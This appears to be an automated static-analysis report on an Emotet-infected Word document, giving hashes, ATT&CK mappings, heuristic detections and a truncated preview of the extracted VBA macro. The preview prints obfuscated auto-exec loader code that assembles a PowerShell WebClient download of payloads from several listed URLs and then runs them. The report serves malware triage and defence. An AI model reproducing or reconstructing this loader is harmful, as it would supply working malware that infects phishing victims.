Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 18ed17ce41f9cf81…

MALICIOUS

Office (OLE)

Size: 90.0 KB
Created: 2017-11-09 05:20:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: e0aaf334411dc5572b7ba40da42f823f
SHA-1: d4e6576e21a7278efc51ab548b2a4e71b28ad402
SHA-256: 18ed17ce41f9cf815f2f3fef40b2310e0d6d76bb4500f7589769173eb678a0b6
Risk Score: 304

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The file contains heavily obfuscated VBA macros, including an AutoOpen function, which is a strong indicator of malicious intent. The presence of a Shell() call and the ClamAV detection signature 'Doc.Macro.Emotet-6374344-0' strongly suggest this is an Emotet variant. The obfuscated script likely downloads and executes a secondary payload, a common tactic for Emotet.

Heuristics 9

  • ClamAV: Doc.Macro.Emotet-6374344-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.eoskin, reached via: In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main, reached via: In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 51155 bytes
SHA-256: 7457b27062a023b1292959a1c5ab0e5383eb6b81e66a098a37e01b3745544d93
Detection:
  • ClamAV: No threats found
  • Obfuscation or payload: likely (carved artifact contains 30 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DFDBnUzTh"
Function PZukBFBaU()
unlNIsK = "" + hNVEqvv + Mid("naR]82+[cHaR]54),[stRING][cHaR]36).rE'+'plAcE(([cHaR]120+[cHaR]114+[cHaR'+3qw2JIdiw9zqiLs48QUo0WQsI80JbnYSKf", 2, 73) + ivIzYdo + OMlnnQt
LwwJZzo = "" + cHDpZvX + Mid("pHJ84fn58zh72rh;bxrh+xrhr'+'xrh+xrheaP4'+'v+P4vk;}'+'P4'+'v+P4vcaxr'+'h+xrhtch{write-hxrh'+'+xrhost cxrh+xrhw0_P4v+P4vxr'+'h+'+'x'+'rhJcmURSoNt2pZJfn", 14, 121) + fQYNwHi + YZRjtRa
WsrIBZGLk = "" + kzqwrHF + Mid("SYOqtzXlDBYZ']104),[stRING][cHaR]39).rEplAcE(P4v7qfP4v,[stRING]['+'cHaR]124)T32 IEx').R3cCY", 13, 75) + qXzLnDq + cDWkEcS
MKDkPj = "" + svaStwj + Mid("lkvfq4vVpu+xrjMWzwinfOO", 11, 3) + DRcPBdh + qCiHKkJ
URACwUPvOz = "" + KmiTSkf + Mid("Es3WloFvC2rhJ0+[CHAR]102),'+'[CHAR]39-rePLAce  xrhcw0xrh,[CHAR]36-CREplaCexrhhXoxrh,kmdX2AYsmE", 14, 71) + DoljFKH + smkEJzc
acKjSAsiDB = "" + YrSZNPw + Mid("TYQhSFrhuxrh'+'+xrhas =xrh+xrh xrAw0Vo LVCDO639Ghj8o3AjJoDK5sU5Di", 7, 27) + jOzMfvG + YzwLwXn
jqBKJP = "" + lklMnPk + Mid("Oimect rMucCJzzllAIRFmdaNKzGVXu6fXj4T", 4, 5) + wzlhbhC + VLQVEoT
ZOhwuwtH = "" + amjYzZL + Mid("E5Sw7NtV(mPfxrh+xrh,xrh+xrhmPx'+'rh+xrhfxrh+xrh)xrh+xrh;cw0karapas =xrh+xrh cw0nxrh+xrhsxrh+xrhaxrh+xrhdasd.nextxrh+xrh(xrh+xrh1, 34xrh+xrh3xrh+xrh24xrh+xrh5);xrh+xrhcw0xrh+P4v+P4vxrhhxrhP4v+P4v+x7T1h5oirGoEmjIl", 9, 188) + hVtziqY + itvZZbf
JrITL = "" + ljotwXp + Mid("8ELh.exrhP4v+P4v+xrhxem'+'Pfxrh+xrh;foxrh+xrhrexrh+xrhaxrh+xrhchxrh+'+'xrh(cw0abc iP4v+P4vxrh+xrhnxrh+xrh cwP4v+P4'+'vxrh+xr'+'hP4v+P4v0bcd){try{xrh+'+'xrhcw0xrhK5HwiHkn", 4, 158) + BRPLqnW + zSGkjzT
LSJZADdV = "" + lfdHkRE + Mid("a NCfPx'+'rh)  -rePLAce ([CHAR]109'+'+[CHP4v+P4vAR]8620JJF", 7, 46) + BWtszmQ + vGYlKXY
FLiiF = "" + GbOCJGu + Mid("GM9sSBIhmPf xrhP4v+PoMJ1n8aHsR9l", 8, 13) + wnMvuCl + KBolqNc
UMFcr = "" + WIOScGf + Mid("pKG3anxrh+xrhdxrh+xP'+'4v+P4vrhoxrh+P4v+P4vxrhmxrP4v+P4vh+xrh;cxrh+xrhw0bcdP'+'4v+P4v = mPfhttp://www.eoskin'+'.cnxrh+xrh/dxrh+xP4v+P4vrh/P4v+P4v,hxrh+'+'xrhttpxrh+xrh://'+'febaCIAYHZ2QdQWjhb22", 5, 173) + zLwRlRB + zctTwwf
vXjPSSldVY = "" + WYlVfwT + Mid("sTkGT9qK (' (P4v((xrhcw'+'0fxrh+xrhranc = new-oxrh+xrhbjectxrh+xrh SyP4v+P4vstem.Net.WebCli'+'enxrh+xrht;cxrh+xrhwxrh+xrhP4v+P4v0nsadxrh+xrhasxrh+xrhd '+'=xrh+xrh new'+'-'+'objULoDI", 9, 168) + iTsdpEJ + IPWDQmj
wLGlUErlBkI = "" + icRjRzF + Mid("rMX22I37ITwEpLAce('P4v',[sTRING][CHar]39).REpLAce(([CHar]84+[CHar]51+[CHar]50),'|') | &( $env:cOmSPec[4,15,25]-Join'')VIAFd", 12, 107) + kWQfQkw + LizsAji
XIFlMQR = "" + mhVilFF + Mid("2mGGV70lvC0PQY6ihtxrh+xr'+'hep.coxrh+xrhmx'+'rh+xrh/'+'Sxrh+x'+'rhSbTyrS/xrh+xrhmPf.Splxrh+xrhitY616Aaj", 18, 79) + jQIhpXR + GiSZmYH
zbTvYUJiX = "" + WSvcDlT + Mid("zTjkjinrhm/ilZxrh+xrh/xrh+xrh,P4v+P4vxrh+xr'+'hhxrh+xrhttpxrh+xrh:xrP'+azf09FJkfE0JJvQtpqkSiDqqYzXSnjv", 8, 64) + PUDLbUo + SiBIlEV
rqMSlCDaI = "" + iKVWOwv + Mid("fd[CHAR]92)7qf&( XR6sHeLLID[1]+XR6sheLLiD[13]P4v+P4v+xrhxxP4v+P4vrh)P4v).rEplAcE(([cHaR]88+[cHtovrqvj13zwC", 3, 92) + BJQcKch + vGjsuRp
jbEpSCN = "" + mPpYJbG + Mid("WbL7OtU'4v+P4vh+xrh//vixrh+xrhrtualdxrhP4v+P4v+xrhoorxrP4v+P4vh+xrhsNi7SD", 8, 61) + wjbtOoT + ZcwpLwv
jiYkGPpRpa = "" + CVINZRN + Mid("SQJqCMjYh3v4iBBD7XW0XjU4T3Js9vM4GJGu.nexrh+xrht/'+'YAqJxrh+xrh/xrh+xrh,htxrh+xrhtpxrh+xrh://www.emont-P4v+P4vdP4v+P4vnxr'+'h+xrhepr.xrh+xrhcom/'+'DZonxrh+xr'+'htEn/,httP4v+P4vp://www.ecobui'+'ldsolutionsxrh+xrhgh.coxrh+x5mt", 37, 184) + XEEuJhi + hrFCvLs
DbMzKwl = "" + jzZdMzM + Mid("NsoJ7JRboWKnzn9KYBh+x'+'rhcw0enxrh+xrhv:xrh+xrhpxrhP4v+P4'+'v+xrhublxrh'+'+xrhic +xP4v+P4vrhP4v+P4v+xP4v+P4vrh mPfhXoxrh+xrMDjPNJ", 19, 105) + YROVfRm + FfIIYdZ
bcOXuM = "" + cSwtNWf + Mid("M13oke-Ixrh+xrhtemxrh+P4v'+'+P4vxrh(cxrhP4v+P4v'+'+xrhw0xrh+'+'xrhhP4v+P4vuaxr'+'h+xr'+'hs)xrh'+'+xiiYbZr99DoTlFqHvvd7R0ZW8wzS", 4, 96) + ohGQMdC + brjwBUn
KSvpp = "" + JfQDjWo + Mid("aQwd8Zb),xrh+xrh cxrh
... (truncated)